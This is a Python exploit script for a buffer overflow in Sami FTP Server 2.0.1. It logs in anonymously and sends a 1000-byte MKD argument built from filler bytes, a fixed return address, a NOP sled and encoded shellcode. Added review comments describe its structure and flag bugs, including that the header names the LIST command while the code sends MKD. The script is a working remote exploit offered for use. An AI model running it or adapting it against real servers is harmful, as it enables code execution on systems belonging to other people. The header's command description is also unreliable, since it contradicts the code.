#!/usr/bin/env python
#-*- coding:utf-8 -*-

# Exploit Title: Sami FTP LIST buffer overflow
# Date: 27 Feb 2013
# Exploit Author: superkojiman - http://www.techorganic.com
# Vendor Homepage: http://www.karjasoft.com/old.php
# Version: Sami FTP Server 2.0.1
# Tested on: Windows XP Pro SP1, English
#            Windows XP Pro SP2, English
#
# Description: 
# A buffer overflow is triggered when a long LIST command is sent to the 
# server and the user views the Log tab. 
#

from socket import *
import struct, sys

# Target host taken verbatim from the first command-line argument. There is
# no validation: a missing argument raises IndexError before any socket is
# opened.
IP = sys.argv[1]
# Opaque payload bytes carried inside the oversized FTP argument built below.
# Nothing on this page documents what these bytes do; treat them as an
# untrusted blob rather than something to reason about from the hex alone.
# NOTE(review): this script relies on Python 2 semantics -- the str literals
# here are used directly as raw bytes on the socket, which is why it does not
# run unchanged under Python 3 (send() would reject a str).
shell_code = ("\xb8\xa2\xde\x67\x36\xda\xdf\xd9\x74\x24\xf4\x5b\x29\xc9\xb1"+
"\x56\x31\x43\x13\x83\xc3\x04\x03\x43\xad\x3c\x92\xca\x59\x49"+
"\x5d\x33\x99\x2a\xd7\xd6\xa8\x78\x83\x93\x98\x4c\xc7\xf6\x10"+
"\x26\x85\xe2\xa3\x4a\x02\x04\x04\xe0\x74\x2b\x95\xc4\xb8\xe7"+
"\x55\x46\x45\xfa\x89\xa8\x74\x35\xdc\xa9\xb1\x28\x2e\xfb\x6a"+
"\x26\x9c\xec\x1f\x7a\x1c\x0c\xf0\xf0\x1c\x76\x75\xc6\xe8\xcc"+
"\x74\x17\x40\x5a\x3e\x8f\xeb\x04\x9f\xae\x38\x57\xe3\xf9\x35"+
"\xac\x97\xfb\x9f\xfc\x58\xca\xdf\x53\x67\xe2\xd2\xaa\xaf\xc5"+
"\x0c\xd9\xdb\x35\xb1\xda\x1f\x47\x6d\x6e\x82\xef\xe6\xc8\x66"+
"\x11\x2b\x8e\xed\x1d\x80\xc4\xaa\x01\x17\x08\xc1\x3e\x9c\xaf"+
"\x06\xb7\xe6\x8b\x82\x93\xbd\xb2\x93\x79\x10\xca\xc4\x26\xcd"+
"\x6e\x8e\xc5\x1a\x08\xcd\x81\xef\x27\xee\x51\x67\x3f\x9d\x63"+
"\x28\xeb\x09\xc8\xa1\x35\xcd\x2f\x98\x82\x41\xce\x22\xf3\x48"+
"\x15\x76\xa3\xe2\xbc\xf6\x28\xf3\x41\x23\xfe\xa3\xed\x9b\xbf"+
"\x13\x4e\x4b\x28\x7e\x41\xb4\x48\x81\x8b\xc3\x4e\x4f\xef\x80"+
"\x38\xb2\x0f\x27\x02\x3b\xe9\x4d\x64\x6a\xa1\xf9\x46\x49\x7a"+
"\x9e\xb9\xbb\xd6\x37\x2e\xf3\x30\x8f\x51\x04\x17\xbc\xfe\xac"+
"\xf0\x36\xed\x68\xe0\x49\x38\xd9\x6b\x72\xab\x93\x05\x31\x4d"+
"\xa3\x0f\xa1\xee\x36\xd4\x31\x78\x2b\x43\x66\x2d\x9d\x9a\xe2"+
"\xc3\x84\x34\x10\x1e\x50\x7e\x90\xc5\xa1\x81\x19\x8b\x9e\xa5"+
"\x09\x55\x1e\xe2\x7d\x09\x49\xbc\x2b\xef\x23\x0e\x85\xb9\x98"+
"\xd8\x41\x3f\xd3\xda\x17\x40\x3e\xad\xf7\xf1\x97\xe8\x08\x3d"+
"\x70\xfd\x71\x23\xe0\x02\xa8\xe7\x10\x49\xf0\x4e\xb9\x14\x61"+
"\xd3\xa4\xa6\x5c\x10\xd1\x24\x54\xe9\x26\x34\x1d\xec\x63\xf2"+
"\xce\x9c\xfc\x97\xf0\x33\xfc\xbd")

# Twenty 0x90 bytes prepended to the payload.
# NOTE(review): the name `buffer` shadows the Python 2 builtin of the same
# name; harmless here, but confusing to anyone reading the file.
buffer = "\x90" * 20 + shell_code
# The oversized argument: 247 filler bytes, a fixed 4-byte value (presumably
# the overwritten control value for the XP SP1/SP2 builds listed in the header
# -- not confirmable from this page), the payload, then "C" padding so the
# total is always 1000 bytes (247 + 4 + 749). If len(buffer) ever exceeded
# 749 the padding count would go negative and "C" * negative yields "", so
# the argument would silently grow past 1000 bytes rather than fail.
buf = "A" * 247 + "\x65\x82\xa5\x7c" + buffer + "C" * (749 - len(buffer)) 

# Connect to the FTP control channel (port 21) and read the banner. Every
# recv() result in this script is discarded, so no server reply is ever
# checked; each call also blocks without limit because no timeout is set.
s = socket(AF_INET, SOCK_STREAM)
s.connect((IP,21))
s.recv(1024)

# Anonymous login with the placeholder password a@a.
s.send("USER anonymous\r\n")
s.recv(1024)

s.send("PASS a@a\r\n")
s.recv(1024)

# Send the 1000-byte argument as an MKD command.
# NOTE(review): the file header describes a long LIST command, but the
# command actually sent here is MKD; the two do not agree.
# From a detection standpoint a single FTP command line of roughly 1 KB is
# an easy anomaly for a protocol-aware sensor or server log review to flag.
s.send('MKD ' + buf + '\r\n')
s.recv(1024)

s.close()

